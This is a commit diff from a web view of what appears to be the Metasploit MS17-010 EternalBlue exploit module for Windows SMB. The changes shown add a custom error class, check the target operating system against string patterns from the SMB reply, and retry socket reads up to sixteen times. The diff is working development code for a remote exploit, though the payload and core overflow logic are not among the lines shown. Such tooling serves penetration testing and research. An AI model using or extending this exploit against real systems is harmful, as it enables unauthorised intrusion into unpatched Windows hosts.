basic OS verification, ghetto socket read code
parent
6fb4040d11
commit
646ca14375
|
@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
end
|
||||
|
||||
class EternalBlueError < StandardError
|
||||
end
|
||||
|
||||
def check
|
||||
# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
|
||||
end
|
||||
|
@ -121,6 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
rescue EternalBlueError => e
|
||||
print_bad("#{e.message}")
|
||||
rescue ::RubySMB::Error::UnexpectedStatusCode,
|
||||
::Errno::ECONNRESET,
|
||||
::Rex::HostUnreachable,
|
||||
|
@ -149,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Connection established for exploitation.")
|
||||
|
||||
if not verify_target(os)
|
||||
return
|
||||
raise EternalBlueError, "Unable to continue with improper OS Target."
|
||||
end
|
||||
|
||||
#if not verify_arch
|
||||
|
@ -203,24 +208,33 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# tree disconnect
|
||||
# logoff and x
|
||||
# note: these aren't necessary, just close the sockets
|
||||
|
||||
return true
|
||||
ensure
|
||||
abort_sockets
|
||||
end
|
||||
end
|
||||
|
||||
def verify_target(os)
|
||||
os = os.gsub("\x00", '') # strip unicode bs
|
||||
os << "\x00" # but original has a null
|
||||
ret = true
|
||||
|
||||
if datastore['VerifyTarget']
|
||||
if false
|
||||
los = os.downcase
|
||||
#if los.include 'server 2008 r2' or os =~ /windows 7/i
|
||||
ret = false
|
||||
# search if its in patterns
|
||||
target['os_patterns'].each do |pattern|
|
||||
if os.downcase.include? pattern.downcase
|
||||
ret = true
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
if ret
|
||||
print_status("Target OS selected valid for OS indicated by SMB reply")
|
||||
else
|
||||
print_warning("Target OS selected not valid for OS indicated by SMB reply")
|
||||
print_warning("Disable VerifyTarget option to proceed manually...")
|
||||
ret = false
|
||||
end
|
||||
print_status("Target OS selected valid for OS indicated by SMB reply")
|
||||
end
|
||||
|
||||
# cool buffer print no matter what, will be helpful when people post debug issues
|
||||
|
@ -230,9 +244,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def print_core_buffer(os)
|
||||
os = os.gsub("\x00", '') # don't do the unicode
|
||||
os << "\x00" # but original has a null
|
||||
|
||||
print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
|
||||
|
||||
count = 0
|
||||
|
@ -344,7 +355,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def smb1_get_response(sock)
|
||||
raw = sock.get_once
|
||||
raw = nil
|
||||
|
||||
# dirty hack since it doesn't always like to reply the first time...
|
||||
16.times do
|
||||
raw = sock.get_once
|
||||
break unless raw.nil? or raw.empty?
|
||||
end
|
||||
|
||||
response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
|
||||
code = response.nt_status
|
||||
return code, raw, response
|
||||
|
|
Loading…
Reference in New Issue